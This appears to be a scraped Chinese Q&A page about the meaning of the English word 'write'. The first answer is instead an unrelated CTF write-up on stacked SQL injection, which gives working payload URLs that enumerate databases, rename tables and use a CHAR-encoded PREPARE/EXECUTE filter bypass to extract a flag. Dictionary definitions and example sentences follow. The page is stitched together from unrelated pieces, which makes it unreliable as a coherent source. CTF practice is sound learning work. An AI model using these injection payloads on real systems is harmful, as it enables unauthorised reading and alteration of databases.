write是什么意思翻译
发布网友
发布时间:2022-04-26 15:14
共4个回答
懂视网
时间:2022-04-11 11:43
查询所有数据库
http://159.138.137.79:53698/?inject=1‘ and 1=2; show databases;--+
array(1) {
[0]=>
string(11) "ctftraining"
}
array(1) {
[0]=>
string(18) "information_schema"
}
array(1) {
[0]=>
string(5) "mysql"
}
array(1) {
[0]=>
string(18) "performance_schema"
}
array(1) {
[0]=>
string(9) "supersqli"
}
array(1) {
[0]=>
string(4) "test"
}
显示所有表
http://159.138.137.79:53698/?inject=1‘ and 1=2; show tables;--+
array(1) {
[0]=>
string(16) "1919810931114514"
}
array(1) {
[0]=>
string(5) "words"
}
查询表的结构
http://159.138.137.79:53698/?inject=1‘ and 1=2; desc `1919810931114514`;--+
array(6) {
[0]=>
string(4) "flag"
[1]=>
string(12) "varchar(100)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
array(6) {
[0]=>
string(2) "id"
[1]=>
string(7) "int(10)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
array(6) {
[0]=>
string(4) "data"
[1]=>
string(11) "varchar(20)"
[2]=>
string(2) "NO"
[3]=>
string(0) ""
[4]=>
NULL
[5]=>
string(0) ""
}
由此可知,默认查询的表为words表,而flag在另一个表中。
我们可以将另一个表改设为默认查询的表。
http://159.138.137.79:53698/?inject=1‘ or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);--+
array(1) {
[0]=>
string(38) "flag{c168d583ed0d4d7196967b28cbd0b5e9}"
}
相关知识
堆叠注入
在正常的语句后面加分号(;),可顺序执行多条语句,从而造成注入漏洞。
Mysql语句
显示表的列的信息
show columns from table_namedesc table_nameselect * from information_schema.columns where table_schema="" and table_name=""更改表的名字
RENAME TABLE tbl_name TO new_tbl_name[, tbl_name2 TO new_tbl_name2,...]alter table table_name to new name更改字段的名字
alter table t_app change name app_name varchar(20) not null;第二种做法
使用PHP的预处理语句
SET @sql = variable; //设置变量
PREPARE pre from ‘[my sql sequece]‘; //预定义SQL语句
EXECUTE pre; //执行预定义SQL语句sqla
SET @sql = concat(CHAR(115, 101, 108, 101, 99, 116)," * from `1919810931114514`") ;
PREPARE pre from @sql;
EXECUTE pre;
array(2) {
[0]=>
string(1) "1"
[1]=>
string(7) "hahahah"
}
array(1) {
[0]=>
string(38) "flag{c168d583ed0d4d7196967b28cbd0b5e9}"
}
WriteUp_easy_sql_堆叠注入_强网杯2019
标签:super drop 有用 默认 表单 inf -bash error sch
热心网友
时间:2022-04-11 08:51
write
数据来自彩云
英 [rait] 美 [raɪt]
vt.写;铭记;通信;撰述;作曲;起草;承保;显示;描写;注定;预言
[计]记录
vi.写字;著作
双语例句
1. Don't delay, write in now.
别拖了,现在就写吧。
2. I never write letters.
我从不写信。
3. One in five undergraates cannot write grammatically.
五分之一的本科生写作不符合语法规则。
4. He'd hired Norman Mailer to write a screenplay.
他那时雇了诺曼•梅勒来写电影剧本。
5. The car is a write-off.
这辆车报废了。
热心网友
时间:2022-04-11 10:09
write
热心网友
时间:2022-04-11 11:44
写
